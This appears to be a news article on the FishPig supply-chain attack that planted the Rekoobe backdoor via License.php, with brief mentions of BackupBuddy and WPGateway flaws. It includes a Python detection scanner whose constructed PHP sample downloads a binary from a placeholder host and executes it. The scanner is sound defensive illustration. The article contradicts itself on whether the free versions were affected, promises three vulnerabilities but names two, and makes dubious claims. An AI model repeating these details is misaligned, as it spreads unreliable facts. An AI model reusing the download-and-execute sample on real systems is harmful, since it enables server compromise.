WordPress Powered Sites Backdoored after FishPig Supply Chain Attack

FishPig is a UK-based software vendor whose products integrate Adobe’s Magento ecommerce suite into WordPress-powered websites. The distribution of its products was compromised, so that the software customers downloaded carried the Rekoobe Linux Trojan, which installed automatically.

There are at least three critical holes in WordPress plugins and tools that are being exploited in the wild right now on numerous websites.

According to the Sansec cybersecurity team, this week FishPig’s software opened up a backdoor by fetching an executable shell script. It turned out that the program was Rekoobe, which lets anyone with access to the server control the machine remotely.

This enabled the attackers to spy on customers, alter or steal data, and so on.

FishPig posted on its website that it had found the code changes, dating back to August, and removed them. Primarily the paid versions of the software were affected, while the free versions of FishPig modules available on GitHub remain clean.

FishPig’s commercial software users have been advised to reinstall the tools and check for signs of compromise.

It is not clear how many people were affected by FishPig’s supply-chain attack, but 200,000 downloads suggest there was a lot of interest in what the company had to offer.

The License.php file on FishPig’s systems was modified to download and execute a malicious binary hosted on FishPig’s platform, producing the program named Rekoobe. As a result, when employees use the License.php file to access their FishPig deployment’s control panel, it automatically runs the harmful program and infects their web server.

License.php is referenced routinely, since it is used to ensure the deployment is appropriately paid for and licensed.
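As an added example (not FishPig’s or Sansec’s code), a small Python scanner that flags PHP files combining a remote fetch with local execution, the shape of the License.php modification described above; the regexes and the two sample files are constructed for illustration and are not real indicators.

```python
import re
from pathlib import Path

# Constructed patterns for the two halves of a download-and-execute modification:
# something that pulls content from a remote URL, and something that runs a program
# or marks a file executable. A file is flagged only when both halves are present.
REMOTE_FETCH = re.compile(
    r"""(?:file_get_contents|fopen|copy)\s*\(\s*['"]https?://|curl_(?:init|exec)\s*\(""",
    re.IGNORECASE,
)
LOCAL_EXEC = re.compile(
    r"""\b(?:exec|shell_exec|system|passthru|proc_open|popen)\s*\(|chmod\s*\([^)]*0?7[57]{2}""",
    re.IGNORECASE,
)

def scan_php_source(source: str) -> dict:
    """Return the matched fragments of each half and whether the file should be flagged."""
    fetch = [m.group(0) for m in REMOTE_FETCH.finditer(source)]
    execs = [m.group(0) for m in LOCAL_EXEC.finditer(source)]
    return {"fetch": fetch, "exec": execs, "flagged": bool(fetch) and bool(execs)}

def scan_tree(root: Path) -> list:
    """Walk a deployment directory and return PHP files that combine fetch and execute."""
    return [p for p in sorted(root.rglob("*.php"))
            if scan_php_source(p.read_text(errors="replace"))["flagged"]]

# Constructed samples, not FishPig's real files. The clean one only talks to a
# license API; the trojanized one also drops and runs a downloaded binary.
CLEAN_LICENSE = '''<?php
$r = file_get_contents("https://license.example.invalid/check?key=" . $key);
if (strpos($r, "valid") === false) { exit("unlicensed"); }
'''
TROJANIZED_LICENSE = '''<?php
$r = file_get_contents("https://license.example.invalid/check?key=" . $key);
$b = file_get_contents("http://updates.example.invalid/lic.bin");
file_put_contents("/tmp/.lic", $b); chmod("/tmp/.lic", 0755); exec("/tmp/.lic");
'''

if __name__ == "__main__":
    for name, src in (("clean", CLEAN_LICENSE), ("trojanized", TROJANIZED_LICENSE)):
        print(name, scan_php_source(src))
```

A hit from this scanner is a prompt to compare the file against a pristine copy from the vendor, not proof of compromise on its own, since legitimate installers can also fetch and run code.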

Rekoobe is malware that, in this case, originated from a single IP address located in Latvia. Once a host is infected, it removes valuable files and resides in the system’s memory. It then communicates with whoever hacked the supply chain, who can sell access to the information compromised on it.

Rekoobe was found as early as 2015 and has been circulating on the internet since. This variant of Rekoobe was written no earlier than 2018, and Intezer has found that it appears to be the pet project of an unknown author with Russian language skills.

Intezer found that newer versions of Rekoobe are hard-coded with C2 addresses and randomly rename their process to fool security analysts.

The company’s free and paid offerings have been affected by the breach. If you’re not sure whether you are affected, get in touch for a free clean-up service.

A WordPress plugin called BackupBuddy was found to have a vulnerability that can be exploited by attackers.

Wordfence this week warned of a zero-day security hole in a plugin called WPGateway being exploited to add malicious administrator accounts to vulnerable websites. We are not aware of a patch being available at the moment, but we will update the article when one is.
